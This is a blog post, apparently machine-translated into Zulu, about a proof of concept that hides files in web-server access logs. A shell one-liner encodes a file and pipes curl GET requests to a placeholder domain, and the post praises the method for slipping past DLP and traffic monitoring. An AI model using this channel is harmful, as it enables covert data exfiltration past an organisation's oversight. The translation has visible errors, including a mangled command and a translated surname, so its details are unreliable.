I-ProHoster > Π‘Π»ΠΎΠ³ > Ukuphatha > Ukushintshaniswa kwemiyalezo eyimfihlo ngamalogi eseva

Ukushintshaniswa kwemiyalezo eyimfihlo ngamalogi eseva

Ngokwencazelo ye-Wikipedia, ukwehla okufile kuyithuluzi lozungu elisebenzela ukushintshanisa ulwazi noma izinto ezithile phakathi kwabantu abasebenzisa indawo eyimfihlo. Umbono wukuthi abantu abakaze bahlangane - kodwa basacobelelana ngolwazi ukuze bagcine ukuphepha kokusebenza.

Indawo yokucasha akufanele idonse ukunaka. Ngakho-ke, emhlabeni ongaxhunyiwe ku-inthanethi bavame ukusebenzisa izinto ezihlakaniphile: isitini esivulekile odongeni, incwadi yelabhulali, noma umgodi esihlahleni.

Kunamathuluzi amaningi okubethela nawokwenza ungaziwa ku-inthanethi, kodwa iqiniso lokusebenzisa la mathuluzi lidonsa ukunaka. Ngaphezu kwalokho, zingavinjelwa ezingeni lebhizinisi noma likahulumeni. Okufanele ngikwenze?

Unjiniyela uRyan Flowers uhlongoze inketho ethokozisayo - sebenzisa noma iyiphi iseva yewebhu njengendawo yokucasha. Uma ucabanga ngakho, yenzani iseva yewebhu? Ithola izicelo, ikhiphe amafayela futhi ibhale amalogi. Futhi ifaka zonke izicelo, ngisho nezingalungile!

Kuvele ukuthi noma iyiphi iseva yewebhu ikuvumela ukuthi ulondoloze cishe noma yimuphi umyalezo kulogi. Izimbali zazibuza ukuthi zingakusebenzisa kanjani lokhu.

Unikeza le nketho:

  1. Thatha ifayela lombhalo (umlayezo oyimfihlo) futhi ubale i-hashi (md5sum).
  2. Siyibhala ngekhodi (gzip+uuencode).
  3. Sibhalela ilogu sisebenzisa isicelo esingalungile ngamabomu kuseva.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Ukuze ufunde ifayela, udinga ukwenza le misebenzi ngokulandelana: khipha ikhodi futhi uvule ifayela, hlola i-hashi (i-hashi ingadluliselwa ngokuphephile eziteshini ezivuliwe).

Izikhala zithathelwa indawo =+=ukuze kungabikho izikhala ekhelini. Uhlelo, umbhali alubiza ngokuthi i-CurlyTP, lusebenzisa umbhalo we-base64, njengokunamathiselwe kwe-imeyili. Isicelo senziwa ngegama elingukhiye ?transfer?ukuze umemukeli akwazi ukuyithola kalula ezingodweni.

Sibonani ezingodweni kuleli cala?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Njengoba sekushiwo, ukuze uthole umlayezo oyimfihlo udinga ukwenza imisebenzi ngokulandelana kwe-reverse:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Inqubo kulula ukuzenzela. I-Md5sum ifana, futhi okuqukethwe kwefayela kuqinisekisa ukuthi yonke into iqoshwe ngendlela efanele.

Indlela ilula kakhulu. β€œIphuzu lalo msebenzi uwukufakazela nje ukuthi amafayela angadluliselwa ngezicelo zewebhu ezingenacala, futhi asebenza kunoma iyiphi iseva yewebhu enamalogi ombhalo angenalutho. Empeleni, wonke amaseva ewebhu ayindawo yokucasha!” kubhala uFlower.

Yebo, indlela isebenza kuphela uma umamukeli ekwazi ukufinyelela izingodo zeseva. Kodwa ukufinyelela okunjalo kunikezwa, isibonelo, ngabasingathi abaningi.

Isetshenziswa kanjani?

U-Ryan Flowers uthi akayena uchwepheshe wezokuphepha kolwazi futhi ngeke ahlanganise uhlu lokusetshenziswa okungenzeka kwe-CurlyTP. Kuye, kuwubufakazi bomqondo wokuthi amathuluzi ajwayelekile esiwabona nsuku zonke angasetshenziswa ngendlela engajwayelekile.

Eqinisweni, le ndlela inezinzuzo eziningi ngaphezu kwesinye iseva "efihla" njenge I-Digital Dead Drop noma I-PirateBox: akudingi ukucushwa okukhethekile ohlangothini lweseva nanoma yiziphi izivumelwano ezikhethekile - futhi ngeke kubangele ukusola phakathi kwalabo abaqapha ithrafikhi. Akunakwenzeka ukuthi isistimu ye-SORM noma ye-DLP izoskena ama-URL ukuze athole amafayela ombhalo acindezelwe.

Lena enye yezindlela zokudlulisa imiyalezo ngamafayela esevisi. Ungakhumbula ukuthi ezinye izinkampani ezithuthukile zazivame ukubeka kanjani Imisebenzi Yonjiniyela Kuzihloko ze-HTTP noma kukhodi yamakhasi e-HTML.

Ukushintshaniswa kwemiyalezo eyimfihlo ngamalogi eseva

Umqondo wawuwukuthi abathuthukisi bewebhu kuphela abazobona leli qanda lePhasika, ngoba umuntu ovamile wayengeke abheke izihloko noma ikhodi ye-HTML.

Ukushintshaniswa kwemiyalezo eyimfihlo ngamalogi eseva

Source: www.habr.com

Engeza amazwana